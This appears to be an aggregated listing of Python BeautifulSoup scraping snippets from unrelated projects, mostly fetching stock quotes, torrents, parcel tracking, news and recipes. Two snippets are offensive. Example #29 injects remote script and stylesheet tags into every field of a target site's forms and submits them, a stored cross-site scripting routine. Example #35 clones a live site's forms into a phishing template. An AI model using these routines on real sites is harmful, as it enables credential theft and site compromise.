Example #1
def main():
	href = 'https://tw.stock.yahoo.com/q/q?s=2412'
	page = urlopen(href) 
	'''
	try:
		href = 'https://tw.stock.yahoo.com/q/q?s=2412'
		session = requests.Session()
		s_time = time.time()
		page = urlopen(href)
		e_time = time.time()
		print(str(e_time - s_time) + ' seconds to fetch the page.')
	except requests.exceptions.HTTPError:
		return None
	'''
	soup = BeautifulSoup(page)
	#print(soup.prettify()) 
	# using BeautifulSoup 3
	if soup is None:
		print('soup is none')

	# align="center" bgcolor="#FFFfff" nowrap
	head = []
	for th in soup.find_all(['th'], width='55'):
		head.append(th.text)
	value = []
	for td in soup.find_all(['td'], bgcolor='#FFFfff'):
		value.append(td.text)
	for i in range(0,len(head)):
		print ( head[i] + ' ' + value[i].rstrip() )
	# /logos/doodles/2014/world-cup-2014-42-4675815216250880-hp.gif 
	'''
def word_parser(word_link) :

  opener = urllib2.build_opener()
  opener.addheaders = [("User-agent", "Mozilla/5.0")] 
  word_page = opener.open(word_link)
  word_soup = BeautifulSoup(word_page)  
  
  
  the_word = re.sub('http://thesaurus.com/browse/', '', str(word_link))
  
  word_check = the_word
  word_check_class = None
  word_extract = "Start"  
  
  while word_extract != None :
    
    word_extract = re.search(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), str(word_soup)).group()
    word_extract_soup = BeautifulSoup(word_extract)
    for link in word_extract_soup.find_all("a", "nud"):
      word_check = link.get_text()
    
    if word_check != the_word : break
    
    word_check_class = word_extract_soup.find_all("div", "adjHdg")
    if str(word_check_class) != "[]" : break
    
    parser_core(word_extract)
     
    word_soup = re.sub(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), '\n', str(word_soup), 1)
    
    word_extract_none = re.search(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), str(word_soup))
    if word_extract_none == None : break
Example #3
 def search(self, terms):
     torrents = []
     p = []
     if ' ' in terms:
         p = terms.split(' ')
     else:
         p.append(terms)
     self.urlTemp = self.url
     if p[0] == "series" or p[0] == "films":
         if p[0] == "series":
             self.urlTemp += "/torrents_series.html"
         if p[0] == "films":
             self.urlTemp += "/torrents_films.html"
         if len(p) > 1:
             self.urlTemp += ",page-" + str(int(int(p[1]) - 1))
     else:
         search = self.clean(terms)
         search = search + ".html"
         self.urlTemp += self.path + search
     try:
         f = requests.get(self.urlTemp,
                          cookies=self.tokens,
                          headers=self.headers)
     except:
         self.initializeScraper()
         try:
             f = requests.get(self.urlTemp,
                              cookies=self.tokens,
                              headers=self.headers)
         except requests.exceptions.RequestException as e:
             # 'f' is unbound if the retry itself failed, so just re-raise
             raise Exception('something wrong') from e
     response = f.text
     if self.error in response:
         # raise Exception("no torrent")
         return torrents
     else:
         soup = BeautifulSoup(response, 'html.parser')
         tds = soup.find_all("td")
         for td in tds:
             if td.i != None:
                 if "fa" in td.i.get("class"):
                     attributs = td.parent.find_all("td")
                     f2 = requests.get(td.a['href'],
                                       cookies=self.tokens,
                                       headers=self.headers)
                     soup = BeautifulSoup(f2.text, 'html.parser')
                     dl = soup.find_all(
                         'a', {'class': "btn btn-danger download"})
                     torrents.append({
                         'url': self.url + dl[1]['href'],
                         'name': td.a.text.encode('utf-8'),
                         'seeds': int(attributs[2].text),
                         'leechers': int(attributs[3].text),
                     })
     return torrents
Example #4
def getTrack(content):
    selected_track = None
    sleep(0.5)
    request_content_page = requests.get(tunefind_search_uri + content['uri'],
                                        headers=headers)
    soup = BeautifulSoup(request_content_page.text, 'html.parser')
    all_tracks = soup.find_all(
        class_='AppearanceRow__container___XH3q9'
    ) if content['type'] == 'artist' else soup.find_all(
        class_='SongRow__container___3eT_L')

    if not len(all_tracks):
        print("We couldn't find any songs for this %s" % (content['type']))
        return

    minEntryIndex = int(min(range(len(all_tracks))) + 1)
    maxEntryIndex = int(max(range(len(all_tracks))) + 1)

    if minEntryIndex == maxEntryIndex:
        playback_link = extractMediaLink(all_tracks[0])
        openLink(playback_link)
        return

    for index, track_single in enumerate(all_tracks):
        song_title = track_single.find(
            class_='AppearanceRow__songInfoTitle___3nWel'
        ) if content['type'] == 'artist' else track_single.find(
            class_='SongTitle__link___2OQHD')
        print('Title: %s' % (song_title.text))
        print('Index: %d' % (int(index) + 1))

    select_number = input(
        'Please select a number from %d to %d for the track you want: ' %
        (minEntryIndex, maxEntryIndex))

    while not select_number:
        select_number = input('Please select a number from %d to %d: ' %
                              (minEntryIndex, maxEntryIndex))

    while not int(select_number) >= minEntryIndex:
        select_number = input('Please select a number from %d to %d: ' %
                              (minEntryIndex, maxEntryIndex))

    while not int(select_number) <= maxEntryIndex:
        select_number = input('Please select a number from %d to %d: ' %
                              (minEntryIndex, maxEntryIndex))

    selected_track = all_tracks[int(select_number) - 1]
    playback_link = extractMediaLink(selected_track)
    openLink(playback_link)
Example #5
    def subcommand_news_find(self, user, dst, args):
        """Queries Google News for the first page of news results
        for a given keyword.
        Syntax: {0}news find <keyword>
        """
        if not user.admin:
            raise PluginBase.InvalidPermission
        try:
            # TODO: Consider the safety of directly placing user input
            r = requests.get(self.strings.URL_GOOGLE_SEARCH.format(args))
        except requests.ConnectionError:
            self.irch.say(self.strings.CONNECTION_ERROR, dst)
            return

        r.encoding = 'utf-8'
        soup = BeautifulSoup(r.text)

        titles = soup.find_all(class_='r')
        search_set = []

        for tag in titles:
            url = tag.contents[0].attrs['href'].split('=', 1)[1]
            title = tag.text
            parent = tag.parent
            source, timestamp = parent.find(class_='f').text.split(' - ')
            summary = parent.find(class_='st').text

            search_set.append([title, timestamp, source, url, summary])

        if len(search_set) > 0:
            self.news['set'] = NewsSet(name='Search: {0}'.format(args),
                                       set_=search_set)
            self.irch.say(self.news['set'].get(), dst)
        else:
            self.irch.say(self.strings.KEYWORD_NOT_FOUND, dst)
def parseHTML(page, output_f):
	array = [] 
	soup = BeautifulSoup(page,'html.parser')
	for div in soup.find_all('div',class_ = DIV_SELECTOR):
		try:
			event = div.find('div',class_ = EVENT_SELECTOR)
			if event:
				elt ={}
				link = event.find('a')
				text = link.get_text()
				if isVisit(text):
					elt['visit'] = text
				else :
					elt['query_text'] = text
				elt['link'] = link["href"]
				elt['date'] = event.find('br').get_text()
				meta = div.find('div',class_ =META_SELECTOR)
				if meta :
					elt['meta'] = meta.get_text()
				array.append(elt)
		except:
			print "Failed to parse elt"	

  
	print array	
	print output_f
	with open(output_f, 'w') as outfile:
		json.dump(array, outfile)	
def getEcNumbers(file):
    handler = open(file).read()
    soup = Soup(handler, 'xml')
    reactions = soup.find_all('reaction')
    ec_numbers = {}

    for reaction in reactions:
        links = reaction.find_all("li")
        BiGG_ID = ""
        EC_number = ""

        for link in links:
            if "identifiers.org/ec-code" in link['resource']:
                EC_number = link['resource'][31:]
            elif "identifiers.org/bigg.reaction" in link['resource']:
                BiGG_ID = reaction['id']
                if 'R_' in BiGG_ID:
                    BiGG_ID = BiGG_ID[2:]

        if EC_number and BiGG_ID:
            # CHANGED: now we just save the EC number, since the names of the
            # enzymes and metabolites were never used for querying Brenda.
            ec_numbers[BiGG_ID] = EC_number

    return ec_numbers
def get_json():
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup

    def get_website_source(url: str) -> str:
        request_headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) '
            + 'Chrome/35.0.1916.47 Safari/537.36'
        }
        request = urllib.request.Request(url, headers=request_headers)
        with urllib.request.urlopen(request) as response:
            # print(response.read())
            return response.read().decode('utf-8')

    print('Download page ')
    source = get_website_source(
        'http://ftp.ebi.ac.uk/pub/databases/RNAcentral/current_release/json/')

    # print(source)
    parsed_html = BeautifulSoup(source, "lxml")

    names_json = []
    for row in parsed_html.find_all('a'):
        href = row['href']
        if 'ensembl-xref-' in href:
            names_json.append(href)

    return names_json
Example #9
def gather_html():
    stat_ids = []
    for category in category_labels:
        category_url = category_url_stub % (category)
        page = requests.get(category_url)
        html = BeautifulSoup(page.text.replace('\n', ''), 'html.parser')
        for table in html.find_all("div", class_="table-content"):
            for link in table.find_all("a"):
                stat_ids.append(link['href'].split('.')[1])
    starting_year = 2015  # fetch one page first in order to see which years we have info for
    for stat_id in stat_ids:
        url = url_stub % (stat_id, starting_year)
        page = requests.get(url)
        html = BeautifulSoup(page.text.replace('\n', ''), 'html.parser')
        stat = html.find("div", class_="parsys mainParsys").find('h3').text
        print(stat)
        directory = "stats_html/%s" % stat.replace('/', ' ')  # replace '/' so it is not treated as a path separator
        if not os.path.exists(directory):
            os.makedirs(directory)
        years = []
        for option in html.find("select", class_="statistics-details-select").find_all("option"):
            year = option['value']
            if year not in years:
                years.append(year)
        url_filenames = []
        for year in years:
            url = url_stub % (stat_id, year)
            filename = "%s/%s.html" % (directory, year)
            if not os.path.isfile(filename): #this check saves time if you've already downloaded the page
                url_filenames.append((url, filename))
        # spawn the downloads once per stat, after the full year list is built
        jobs = [gevent.spawn(gather_pages, pair[0], pair[1]) for pair in url_filenames]
        gevent.joinall(jobs)
Example #11
 def get_comment(self, item):
     html = self.__down_load(item, 1)
     # print html
     soup = BeautifulSoup(html)
     if soup:
         for l in soup.find_all(attrs={'class': 'u-con'}):
             print l.string
Example #12
def olx_parser(home_ids):
    data = []
    page = requests.get(OLX_URL)
    soup = BeautifulSoup(page.text, "lxml")
    tables = soup.find_all('table', attrs={'summary': 'Ogłoszenie'})
    for table in tables:
        id = table.attrs['data-id']
        if id in home_ids:
            continue
        text = ""
        url = ""
        img = ""
        table_body = table.find('tbody')
        rows = table_body.find_all('tr')
        for row in rows:
            cols = row.find_all('td')
            if cols[0].contents[1].name == 'a':
                url = cols[0].contents[1].attrs['href']
            if cols[0].contents[1].contents[1].name == 'img':
                img = cols[0].contents[1].contents[1].attrs['src']
            cols = [ele.text.rstrip() for ele in cols]
            for col in cols:
                text = text + col.replace("\n", " ") + " "
        while '  ' in text:
            text = text.replace('  ', ' ')
        data.append(Home(table.attrs['data-id'], text, url, img))

    return data
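olx_parser builds Home(id, text, url, img) objects and reads OLX_URL, neither of which appears in this listing. A minimal stand-in for Home, inferred only from that call and not taken from the original project, could look like this:

class Home:
    """Hypothetical container matching the Home(id, text, url, img) call above."""

    def __init__(self, id, text, url, img):
        self.id = id      # the listing's data-id attribute
        self.text = text  # flattened text of the table row
        self.url = url    # link to the offer
        self.img = img    # thumbnail image URL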
Example #13
def find_tag(html, tag):

    # parse text
    parsed_html = BeautifulSoup(html)
    tags_all = parsed_html.find_all(tag)

    # find all instances of tag and its weight attribute, if any
    tags = []
    weights = []
    if tags_all:
        for item in tags_all:
            tags.append(item.text.strip())
            if 'weight' in item.attrs:
                weights.append(item['weight'])

    # return results in special cases
    if not tags:
        return '', ''
    elif 'NO CATEGORIES' in tags:
        return 'NO CATEGORIES', ''
    elif len(tags) == 1 and len(weights) == 1:
        return tags[0], weights[0]
    elif len(tags) == 1 and not weights:
        return tags[0], ''

    # return results
    return tags, weights
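A quick, made-up call shows the (tags, weights) shape that find_tag returns when several tags carry a weight attribute:

# Illustrative only; the <category> markup below is invented, not from the source data.
sample = '<category weight="0.9">sports</category><category weight="0.4">news</category>'
tags, weights = find_tag(sample, 'category')
print(tags)     # ['sports', 'news']
print(weights)  # ['0.9', '0.4']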
Example #14
def extract_tenders_from_web_page_by_url(url):
    html = requests.get(url).text
    parsed_html = BeautifulSoup(html, "html.parser")
    if is_last_page(parsed_html):
        return None
    a = parsed_html.find_all("a", {"class": "shortestProcedures__item"})
    tender_list = []
    for tender in a:
        t = Tender()
        t.link = tender['href']
        t.number = tender.find("div", {
            "class":
            "shortestProcedures__cell shortestProcedures__cell--number"
        }).get_text()
        t.description = tender.find(
            "div", {
                "class":
                "shortestProcedures__cell shortestProcedures__cell--description"
            }).get_text()
        t.company = tender.find("span", {
            "class": "shortestProcedures__customerName"
        }).get_text()
        t.date = tender.find("span", {
            "class": "shortestProcedures__date"
        }).get_text()
        t.price = tender.find(
            "span", {
                "class":
                "shortestProcedures__price shortestProcedures__price--noPrice"
            }).get_text()
        tender_list.append(t)
    return tender_list
Example #15
def poslaju_info(trackingno):
    _data = {'trackingNo03': trackingno}

    response = requests.post(
        'https://www.pos.com.my/postal-services/quick-access/?track-trace',
        data=_data).text

    if "Please insert the correct Tracking Number.No" in response:
        return None

    regex = re.compile(r'var strTD =  "(.*?)</table>";', re.S | re.M)
    table = regex.search(response).group(1)

    soup = BeautifulSoup(table, "lxml")
    rows = soup.find_all("table")[1].find_all("tr")

    data = []
    for row in rows:
        cells = row.find_all("td")
        items = []
        for cell in cells:
            items.append(truncate(cell.text.strip()))
        data.append(items)
    data.pop(0)  # first row has headers

    print(
        tabulate.tabulate(data,
                          headers=["datetime", "details", "location"],
                          tablefmt="simple"))
Example #16
def parse_table(
        source: str,
        interpret_cells: bool = True) -> Tuple[List[str], List[List[str]]]:
    if interpret_cells:
        for replacement in sub_sup_replacements:
            source = source.replace(replacement,
                                    sub_sup_replacements[replacement])
    parsed_html = BeautifulSoup(source, "lxml")
    column_count = None
    header = []
    rows = []
    current_rowspans = []
    for row in parsed_html.find_all('tr'):
        cells = [x for x in row.find_all('td')]
        if len(cells) == 0:
            cells = [x.text.strip() for x in row.find_all('th')]
            column_count = len(cells)
            current_rowspans = [[0, None] for _ in range(column_count)]  # independent lists, not aliased copies
            header = cells
        else:
            if column_count is None:
                column_count = len(cells)
                current_rowspans = [[0, None] for _ in range(column_count)]  # independent lists, not aliased copies
            for i in range(0, len(current_rowspans)):
                if current_rowspans[i][0] > 0:
                    cells.insert(i, current_rowspans[i][1])
                    current_rowspans[i][0] -= 1
            for i in range(0, len(cells)):
                if 'rowspan' in cells[i].attrs:
                    current_rowspans[i][0] = int(cells[i].attrs['rowspan']) - 1
                    del cells[i].attrs['rowspan']
                    current_rowspans[i][1] = cells[i]
            rows.append([get_cell_contents(x, interpret_cells) for x in cells])
    return header, rows
Example #17
def lel_info(trackingnumber):
    response = requests.get("https://tracker.lel.asia/tracker?trackingNumber="\
        + trackingnumber\
        + "&lang=en-US")

    soup = BeautifulSoup(response.text, "html.parser")

    trace__date_rows = soup.find_all('div', {'class': 'trace__date_row'})
    data = []

    for trace__date_row in trace__date_rows:
        elem = trace__date_row.find("div", {"class": "trace__date"}).text
        date = " ".join(elem.split())

        trace__items = trace__date_row.find_all('tr', {'class': 'trace__item'})

        for trace__item in trace__items:
            time = trace__item.find('span', {'class': 'trace__time'}).text
            value = trace__item.find('span', {
                'class': 'trace__event-value'
            }).text

            data.append([date, time, value])

    t_headers = "Date Time Description".split(" ")
    print(t(data, headers=t_headers))
Example #18
def getmovielist(html):
    soup=BeautifulSoup(html)
         
    divs=soup.find_all('ul',{'class':'mod_list_pic_130'})
    for div_html in divs:
        div_html = str(div_html).replace('\n','')
        getmovie(div_html)
Example #19
def pridobiXML(pot):
    # Get the files
    datoteke = [f for f in listdir(pot) if isfile(join(pot, f))]
    st = 0

    print("-----" + str(len(datoteke)) + " datotek pridobljenih-----")

    #Seznam lematiziranih clankov
    clanki_lem = []

    print("-----Razvrščanje besed v objekte-----")
    #Preberi datoteke v UTF-8

    for d in datoteke:
        if (st % 100 == 0):
            print(".", end="")

        fileObj = codecs.open(pot + d, "r", "utf-8")
        soup = BeautifulSoup(fileObj, 'xml')
        words = soup.find_all('w')
        datum = d.split("_")[1:]
        datum[-1] = datum[-1][0:4]
        clanki_lem.append([])

        # Get the words and store them in the list
        for w in words:
            lb = LematiziranaBeseda(w['lemma'], w['msd'], w.get_text(), datum)
            clanki_lem[st].append(lb)

        st += 1

    return clanki_lem
Example #20
def querySite(domain):
    print('Now visiting ' + domain)
    sleep(3)
    request_search_page = requests.get(domain, headers=headers)
    soup = BeautifulSoup(request_search_page.text, 'html.parser')
    results = soup.find_all(class_='g')

    if request_search_page.status_code != 200:
        print(
            'Error: The URL you are trying to access is returning a status code of %s'
            % (request_search_page.status_code))
        print('This is the response we got: %s' % (request_search_page.text))
        return

    if not len(results):
        print('We couldn\'t find any pages for this URL: %s' % (domain))
        return

    for result in results:
        url = result.find('a')['href']
        parsed_url = urllib.parse.urlparse(url)

        if parsed_url.query:
            query_params = urllib.parse.parse_qs(parsed_url.query)

            if not isEmpty(query_params) and 'q' in query_params:
                url = urllib.parse.parse_qs(parsed_url.query)['q'][0]

        if len(str(url)) < 1:
            continue

        print('Now crawling ' + url)

        sleep(3)

        meta_title = getMeta('title', url)
        meta_description = getMeta('description', url)

        if url is None:
            url = 'N/A'

        if meta_title is None:
            meta_title = 'N/A'

        if meta_description is None:
            meta_description = 'N/A'

        message = str("URL: %s Title: %s Description: %s") % (url, meta_title,
                                                              meta_description)

        print(message, file=outfile)

    if soup.find(isNextLink) is None:
        return

    next_step_link = str(google_base_uri + soup.find(isNextLink)['href'])

    if next_step_link is not None:
        querySite(next_step_link)
Example #21
File: Tbot.py Project: fmg777/Tbot
def function(message):
    news = urllib.request.urlopen(
        'https://ttrcoin.com/article/novosti.12/').read()
    parsed_html = BeautifulSoup(news)
    links = parsed_html.find_all('a', attrs={'class': 'attachHolder'})
    bot.reply_to(
        message,
        "https://ttrcoin.com/article/novosti.12/" + links[1].get('href'))
Example #22
def parse_xml(output):
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    try:
        path = sys.argv[1]
        file = '../{}/bin/Debug/TestResult.xml'
        file = file.format(path)
        xml = open(file)
    except:
        print(
            'Error: Enter a valid file path argument or file not found or inaccessible'
        )
        return -1
    body = []
    soup = BeautifulSoup(xml, 'xml')
    message = ''
    log = ''
    for tag in soup.find_all('test-case'):
        try:
            runName = tag['classname']
            stepName = tag['methodname']
        except:
            runName = tag['fullname']
            stepName = tag['name']
        status = tag['result']
        if tag.find('start-time') is not None and tag.find(
                'end-time') is not None:
            start = tag['start-time']
            startArr = start.split()
            start = startArr[0] + 'T' + startArr[1]
            end = tag['end-time']
            endArr = end.split()
            end = endArr[0] + 'T' + endArr[1]
        else:
            start = None
            end = None
        if status == "Failed":
            status = "FAIL"
        elif status == "Passed":
            status = "PASS"
        else:
            status = "SKIP"
        if status == 'FAIL':
            if tag.find('stack-trace') is not None:
                log = tag.find('stack-trace').text
                log = base64.b64encode(bytes(log, 'utf-8'))
                log = log.decode('utf-8')
            if tag.find('message') is not None:
                message = tag.find('message').text
        else:
            message = ''
            log = ''
        value = create_test_logs_json(runName, stepName, status, message, log,
                                      start, end, output)
        body.append(value)
    return body
Example #23
    def run(self):

        while self.CRAWL:
            # print "Waiting for new URL"
            link = self.urlq.get()  # get the Original Link

            try:
                # print "Waiting to fetch data "
                data = urllib2.urlopen(link).read()  # Fetch data form the Original Link with 15seconds as timeout
            except:
                print "Check Your Internet Connection it has either disconnected or is slow"
                self.urlq.task_done()
                continue
            try:
                soup = BeautifulSoup(data, 'html.parser')
                for atag in soup.find_all('a'):  # Get the list of all links within Original Link
                    lnk = atag.get('href')

                    if lnk is None:
                        continue
                    else:
                        lnk = lnk.encode('utf-8')  # Convert the links to utf encoding

                        if lnk in self.UniqueURLs:  # Avoid crawling visited links so that it doesn't go into a loop!
                            continue

                        if lnk.startswith('http:') or lnk.startswith('https:'):
                            # print "Normal links "+lnk
                            self.urlq.put(lnk)

                        elif lnk.startswith('javascript:'):  # Continue loop if the link is a javascript call
                            # print "Javascript call "+lnk
                            continue

                        elif lnk.startswith('#'):  # Continue loop if the link is a #tag/fragments
                            # print "#tags"
                            continue

                        else:
                            # print "Relative links "+urlparse.urljoin(link,lnk)
                            self.urlq.put(urlparse.urljoin(link, lnk) + "")  # convert relative link into absolute link and add to Queue

            except Exception, e:
                print "Exception has occured with this link", e, lnk

            with lock:
                self.UniqueURLs[link] = 1  # Put the visited link into a dictionary so that already crawled links can be avoided
                if len(self.UniqueURLs) >= LIMIT:
                    self.CRAWL = False  # Set CRAWL to false to stop further crawling
                    print self.name + " LIMIT has been reached. The rest of the unique URLs will be added to the dictionary and saved!"
                while self.urlq.qsize():  # Put the rest of the unique link into the dictionary
                    lnk = self.urlq.get()
                    if lnk in self.UniqueURLs:
                        self.urlq.task_done()
                        continue
                    self.UniqueURLs[lnk] = 1
                    self.urlq.task_done()
                self.urlq.task_done()
Example #24
def parse_results(report):
	data = open('/root/{}'.format(report))
	structure = str(data.readlines())
	soup = BeautifulSoup(structure, 'html.parser')
	tables1 = str(soup.find_all(class_="table table-bordered table-striped")[1])
	tables2 = str(soup.find_all(class_="table table-bordered table-striped")[2])
	tables3 = str(soup.find_all(class_="table table-bordered table-striped")[3])
	soup1 = BeautifulSoup(tables1, 'html.parser')
	soup2 = BeautifulSoup(tables2, 'html.parser')
	soup3 = BeautifulSoup(tables3, 'html.parser')
	rrd4k_data = soup1.find_all('td')[3].string
	rwd4k_data = soup1.find_all('td')[5].string
	rrd16MiB_data = soup2.find_all('td')[3].string
	rwd16MiB_data = soup2.find_all('td')[5].string
	try:
		rws10ms_data = int(soup3.find_all('td')[3].string)
	except ValueError:
		rws10ms_data = 0
	try:
		rws30ms_data = int(soup3.find_all('td')[5].string)
	except ValueError:
		rws30ms_data = 0
	rws100ms_data = int(soup3.find_all('td')[7].string[2:])

	rrd4k_iops = int(re.findall(r"[\d']+", rrd4k_data)[0])
	rwd4k_iops = int(re.findall(r"[\d']+", rwd4k_data)[0])
	rrd16MiB_bandwidth = int(re.findall(r"[\d']+", rrd16MiB_data)[0])
	rwd16MiB_bandwidth = int(re.findall(r"[\d']+", rwd16MiB_data)[0])

	rrd4k_dev = int(re.findall(r"[\d']+", rrd4k_data)[-1])
	rwd4k_dev = int(re.findall(r"[\d']+", rwd4k_data)[-1])
	rrd16MiB_dev = int(re.findall(r"[\d']+", rrd16MiB_data)[-1])
	rwd16MiB_dev = int(re.findall(r"[\d']+", rwd16MiB_data)[-1])
	return dict({"rws10ms_data": rws10ms_data, "rws30ms_data": rws30ms_data, "rws100ms_data": rws100ms_data, "rrd4k_iops": rrd4k_iops, "rwd4k_iops": rwd4k_iops, "rrd16MiB_bandwidth": rrd16MiB_bandwidth, "rwd16MiB_bandwidth": rwd16MiB_bandwidth, "rrd4k_dev": rrd4k_dev, "rwd4k_dev": rwd4k_dev, "rrd16MiB_dev": rrd16MiB_dev, "rwd16MiB_dev": rwd16MiB_dev})
Example #25
def decodeWebpage(url):
    r = requests.get(url)
    soup = BeautifulSoup(r.text)

    for story_heading in soup.find_all(class_="stroy-heading"):
        if story_heading.a:
            print(story_heading.a.text.replace("\n", " ").strip())
        else:
            print(story_heading.contents[0].strip())
Example #26
def job_fnF():
    url = 'https://www1.nseindia.com/live_market/dynaContent/live_watch/option_chain/optionKeys.jsp?segmentLink=17&instrument=OPTIDX&symbol=NIFTY&date=' + edate
    response = requests.get(url)
    resp = response.content
    soup = BeautifulSoup(resp)
    table1 = soup.find('table')
    niftyrow = []
    for row1 in table1.findAll('b'):
        text1 = row1.text.replace('style','')
        niftyrow.append(text1)
    niftyval = int(text1[5:10]) + 2
    callstrk = int(round(niftyval, -2)) + 300
    putstrk = callstrk - 700
    callstring = "%d.00" %callstrk
    for row1 in soup.find_all('tr'):
        cells = row1.find_all('td')
        for cell in cells:
            value = cell.string
            if value == callstring:
                celln = 0
                for cell in cells:
                    celln = celln + 1
                    value = cell.string
                    if celln == 10:
                        CallPrice = value  # mirror the put branch below
                        #print CallPrice
    putstring = "%d.00" %putstrk
    for row1 in soup.find_all('tr'):
        cells = row1.find_all('td')
        for cell in cells:
            value = cell.string
            if value == putstring:
                celln = 0
                for cell in cells:
                    celln = celln + 1
                    value = cell.string
                    if celln == 14:
                        PutPrice = value
                        #print PutPrice
    indtime= datetime.now() + timedelta(hours=5, minutes=30)
    ddtime = '{:%D:%H:%M:%S}'.format(indtime)
#    print "Nifty", niftyval, "Calls",callstrk, "Puts",putstrk, datetime.now(), PutPrice, OpenNifty
    msg = "New: Sell Calls %d , Puts %d , Thanks! "  %(callstrk, putstrk)
    check_output(["yowsup-cli", "demos", "-M","-c", "config", "-s", "*****@*****.**",  "F%s" % msg])
    check_output(["yowsup-cli", "demos", "-M","-c", "config", "-s", "*****@*****.**", "F%s" % msg])
Example #27
def get_links(search_name):
    search_name = search_name.replace(' ', '+')
    url = url_base.format(search_name, 0)
    request = ulib.Request(url, None, headers)
    json_string = ulib.urlopen(request).read()
    page = json.loads(json_string)
    new_soup = Soup(page[1][1], 'lxml')
    images = new_soup.find_all('img')
    links = [image['src'] for image in images]
    return links
Example #28
def get_page_words(pdf_file):

    delete_words = [
        '"', ':', ';', '!', '@', '#', '$', '%', '^', '&', '0', '1', '2', '3',
        '4', '5', '6', '7', '8', '9', '*', '(', ')', '+', '-', '_', '=', '{',
        '}', '[', ']', '?', '/', '<', '>', ',', '.', '|', '`', '~', '"', "'",
        '\\'
    ]

    contents = convert_pdf_to_html(pdf_file)
    # with open(pdf_file) as f:
    #     for line in f.readlines():
    #         contents += line

    contents = contents.replace("\n", "")
    contents = contents.replace("\r", "")
    # contents = contents.rstrip()
    pages = contents.split("<a name=")[1:]
    all_pages = []
    for i in range(len(pages)):
        page_html = BeautifulSoup(pages[i], "html.parser")
        divs = page_html.find_all('div')
        spans = []
        for div in divs:
            spans += div.find_all('span')
        word_list = []
        for span in spans:
            text = span.text.lower()
            text = text.replace("\\n", " ")
            text = text.replace("\\r", " ")
            fin = False
            while not fin:
                if text.find("\\xe") >= 0:
                    idx = text.find("\\xe")
                    text = text.replace(text[idx:idx + 12], "")
                else:
                    fin = True
            for dw in delete_words:
                text = text.replace(dw, " ")
            words = text.split()
            style = span['style']
            bold = ",Bold" in style
            size = style[style.find("font-size:") + 10:-2]
            for word in words:
                if len(word) == 1:
                    continue
                if word != "":
                    word_list.append([word, size, bold])

        all_pages.append(word_list)

    return all_pages


# print (get_page_words("Lec01_note.pdf")[3])
Example #29
    def addPopup(self, url): # (self, url, payload)
        self.url = url
        source = urllib.urlopen(self.url)
        soup   = BeautifulSoup(source.read())
        print ">>> Reading Source...\n\n"
        for form in soup.find_all("form"):
            inputs_submit = []
            inputs_field  = []
            #form_action.append(form.get("action"))   # Get URI to will send
            print ">>> Searching field vulnerabilities...\n\n"
            for inputs in form.find_all("input"):
                if inputs.get("type") == "submit":
                    inputs_submit.append(inputs.get("name"))
                    inputs_submit.append(inputs.get("value"))
                elif inputs.get("type") != "submit":
                    inputs_field.append(inputs.get("name"))
                else:
                    print "Not found any field vulnerability :(\n\n"
            for textarea in form.find_all("textarea"):
                inputs_field.append(textarea.get("textarea"))
			
            vectorJS = {}
            path_archive1 = "core/css.js"
            if os.path.isfile(path_archive1) == True:
                for field in inputs_field:
                    vectorJS[field] = """<script src="http://localhost/GSoC/css.js"></script>"""
                vectorJS[inputs_submit[0]] = inputs_submit[1]
                send_vector = urllib.urlencode(vectorJS)
                print ">>> Vector .js attack...!\n\n"
                print send_vector
                print "-"*75
                parts = urlparse.urlsplit(self.url)
                a = ''
                for i in parts.path.split("/")[0:-1]:
                    a += i + "/"
                send_url = parts.scheme + "://" + parts.netloc + a + form.get("action").split("../")[-1]
                b = ''
                for j in parts.path.split("/")[0:-2]:
                    b += j + "/"
                send_url2 = parts.scheme + "://" + parts.netloc + b + form.get("action").split("../")[-1]
                urllib.urlopen(send_url, send_vector)
                urllib.urlopen(send_url2, send_vector)  # Because some pages used '../send.php' to send a request
                vectorCSS = {}
                path_archive2 = "core/injection.css"
                if os.path.isfile(path_archive2) == True:
                    for field in inputs_field:
                        vectorCSS[field] = """<link rel="stylesheet" href="http://localhost/GSoC/injection.css"/>"""
                    vectorCSS[inputs_submit[0]] = inputs_submit[1]
                    
                send_vector2 = urllib.urlencode(vectorCSS)
                print ">>> Vector .css attack...!\n\n"
                print send_vector2
                print "-"*75
                urllib.urlopen(send_url, send_vector2)
                urllib.urlopen(send_url2, send_vector2)
def alphabetical_parser(alphabetical_link) :
  
  opener = urllib2.build_opener()
  opener.addheaders = [("User-agent", "Mozilla/5.0")]
  alphabetical_page = opener.open(alphabetical_link)
  
  alphabetical_soup = BeautifulSoup(alphabetical_page)
  
  for link in alphabetical_soup.find_all("a", "result_link"):
    section_link = link.get("href")
    section_parser(section_link)
Example #31
def parseTextFromHtml(html):
    text = ""
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    soup = BeautifulSoup(html, "lxml")
    allResult = soup.find_all("div", class_="_3-96 _2let")
    for item in allResult:
        text += item.text + "\n"
    return text
Example #32
def getURL(msg):
    """

    :param msg: html of web page (here: Python home page)
    :return: urls in that page 
    """
    soup = BeautifulSoup(msg)
    links = soup.find_all('a')
    for tag in links:
        link = tag.get('href', None)
        if link is not None:
            print(link)
Example #33
def get_recipes_from_page(page_num):
    res = requests.get(BASE_URL + "/recipes/?page=" + str(page_num))
    res_html = BeautifulSoup(res.text, "html.parser")
    recipes_list = []
    article_tags = res_html.find_all("article")
    for i in article_tags:
        try:
            if i.find("a")["href"].startswith("/recipe/"):
                recipes_list.append(i.find("a")["href"])
        except (KeyError, TypeError):
            pass
    return recipes_list
def section_parser(section_link) :
  
  opener = urllib2.build_opener()
  opener.addheaders = [("User-agent", "Mozilla/5.0")] 
  section_page = opener.open(section_link)
  
  section_soup = BeautifulSoup(section_page)
  
  for link in section_soup.find_all("a", "result_link"):  
    word_link = link.get("href")
    text_file.write("%s"%word_link)
    text_file.write("\n")
    word_parser(word_link)
Example #35
 def checkRequests(self,siteName):
     try:
         html = urlopen(siteName).read()
         request = BeautifulSoup(html)
         try:
             for tag in request.find_all('form'):
                 tag['method'],tag['action'] ='post',''
         except Exception: pass
         self.CheckHookInjection(request,'Templates/Phishing/web_server/index.html')
     except URLError:
         QMessageBox.warning(self,'Request HTTP','It seems like the server is down.')
         return False
